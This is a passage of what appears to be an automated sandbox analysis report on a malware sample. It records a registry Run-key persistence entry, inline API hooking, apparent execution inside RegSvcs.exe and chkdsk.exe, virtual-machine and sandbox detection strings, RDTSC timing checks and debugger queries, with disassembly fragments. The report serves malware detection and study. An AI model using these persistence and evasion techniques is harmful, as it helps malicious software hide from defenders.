Source: C:\Windows\SysWOW64\chkdsk.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 1BULUJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)Show sources
Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE7
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098D4 second address: 00000000004098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B3E second address: 0000000000409B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000012598D4 second address: 00000000012598DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000001259B3E second address: 0000000001259B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409A70 rdtsc 1_2_00409A70
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe TID: 7088Thread sleep time: -49988s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe TID: 7136Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 1272Thread sleep count: 34 > 30Jump to behavior
Source: C:\Windows\explorer.exe TID: 1272Thread sleep time: -68000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 5972Thread sleep time: -55000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exeLast function: Thread delayed
Source: C:\Windows\explorer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: explorer.exe, 00000002.00000000.231338209.0000000005775000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.231267805.00000000056CA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.231180029.0000000005644000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.235519591.00000000078D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmpBinary or memory string: vmware
Source: explorer.exe, 00000002.00000000.231267805.00000000056CA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.231180029.0000000005644000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000002.00000000.232658159.0000000006414000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$%
Source: explorer.exe, 00000002.00000000.231267805.00000000056CA000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.235519591.00000000078D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.235519591.00000000078D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
Source: explorer.exe, 00000002.00000000.231267805.00000000056CA000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.235519591.00000000078D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\vSCyL8NNIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409A70 rdtsc 1_2_00409A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040ACB0 LdrLoadDll,1_2_0040ACB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF58EC mov eax, dword ptr fs:[00000030h]1_2_00EF58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]1_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F8B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]1_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]1_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]1_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]1_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2F0BF mov ecx, dword ptr fs:[00000030h]1_2_00F2F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2F0BF mov eax, dword ptr fs:[00000030h]1_2_00F2F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2F0BF mov eax, dword ptr fs:[00000030h]1_2_00F2F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F220A0 mov eax, dword ptr fs:[00000030h]1_2_00F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F220A0 mov eax, dword ptr fs:[00000030h]1_2_00F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F220A0 mov eax, dword ptr fs:[00000030h]1_2_00F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F220A0 mov eax, dword ptr fs:[00000030h]1_2_00F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F220A0 mov eax, dword ptr fs:[00000030h]1_2_00F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F220A0 mov eax, dword ptr fs:[00000030h]1_2_00F220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F390AF mov eax, dword ptr fs:[00000030h]1_2_00F390AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF9080 mov eax, dword ptr fs:[00000030h]1_2_00EF9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F73884 mov eax, dword ptr fs:[00000030h]1_2_00F73884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F73884 mov eax, dword ptr fs:[00000030h]1_2_00F73884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FB2073 mov eax, dword ptr fs:[00000030h]1_2_00FB2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FC1074 mov eax, dword ptr fs:[00000030h]1_2_00FC1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F10050 mov eax, dword ptr fs:[00000030h]1_2_00F10050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F10050 mov eax, dword ptr fs:[00000030h]1_2_00F10050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0B02A mov eax, dword ptr fs:[00000030h]1_2_00F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0B02A mov eax, dword ptr fs:[00000030h]1_2_00F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0B02A mov eax, dword ptr fs:[00000030h]1_2_00F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0B02A mov eax, dword ptr fs:[00000030h]1_2_00F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2002D mov eax, dword ptr fs:[00000030h]1_2_00F2002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2002D mov eax, dword ptr fs:[00000030h]1_2_00F2002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2002D mov eax, dword ptr fs:[00000030h]1_2_00F2002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2002D mov eax, dword ptr fs:[00000030h]1_2_00F2002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2002D mov eax, dword ptr fs:[00000030h]1_2_00F2002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F77016 mov eax, dword ptr fs:[00000030h]1_2_00F77016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F77016 mov eax, dword ptr fs:[00000030h]1_2_00F77016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F77016 mov eax, dword ptr fs:[00000030h]1_2_00F77016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FC4015 mov eax, dword ptr fs:[00000030h]1_2_00FC4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00FC4015 mov eax, dword ptr fs:[00000030h]1_2_00FC4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]1_2_00EFB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]1_2_00EFB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]1_2_00EFB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F841E8 mov eax, dword ptr fs:[00000030h]1_2_00F841E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F751BE mov eax, dword ptr fs:[00000030h]1_2_00F751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F751BE mov eax, dword ptr fs:[00000030h]1_2_00F751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F751BE mov eax, dword ptr fs:[00000030h]1_2_00F751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F751BE mov eax, dword ptr fs:[00000030h]1_2_00F751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F769A6 mov eax, dword ptr fs:[00000030h]1_2_00F769A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F261A0 mov eax, dword ptr fs:[00000030h]1_2_00F261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F261A0 mov eax, dword ptr fs:[00000030h]1_2_00F261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F22990 mov eax, dword ptr fs:[00000030h]1_2_00F22990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F1C182 mov eax, dword ptr fs:[00000030h]1_2_00F1C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2A185 mov eax, dword ptr fs:[00000030h]1_2_00F2A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EFC962 mov eax, dword ptr fs:[00000030h]1_2_00EFC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EFB171 mov eax, dword ptr fs:[00000030h]1_2_00EFB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EFB171 mov eax, dword ptr fs:[00000030h]1_2_00EFB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F1B944 mov eax, dword ptr fs:[00000030h]1_2_00F1B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F1B944 mov eax, dword ptr fs:[00000030h]1_2_00F1B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2513A mov eax, dword ptr fs:[00000030h]1_2_00F2513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2513A mov eax, dword ptr fs:[00000030h]1_2_00F2513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F14120 mov eax, dword ptr fs:[00000030h]1_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F14120 mov eax, dword ptr fs:[00000030h]1_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F14120 mov eax, dword ptr fs:[00000030h]1_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F14120 mov eax, dword ptr fs:[00000030h]1_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F14120 mov ecx, dword ptr fs:[00000030h]1_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF9100 mov eax, dword ptr fs:[00000030h]1_2_00EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF9100 mov eax, dword ptr fs:[00000030h]1_2_00EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF9100 mov eax, dword ptr fs:[00000030h]1_2_00EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F22AE4 mov eax, dword ptr fs:[00000030h]1_2_00F22AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F22ACB mov eax, dword ptr fs:[00000030h]1_2_00F22ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0AAB0 mov eax, dword ptr fs:[00000030h]1_2_00F0AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0AAB0 mov eax, dword ptr fs:[00000030h]1_2_00F0AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2FAB0 mov eax, dword ptr fs:[00000030h]1_2_00F2FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF52A5 mov eax, dword ptr fs:[00000030h]1_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF52A5 mov eax, dword ptr fs:[00000030h]1_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF52A5 mov eax, dword ptr fs:[00000030h]1_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe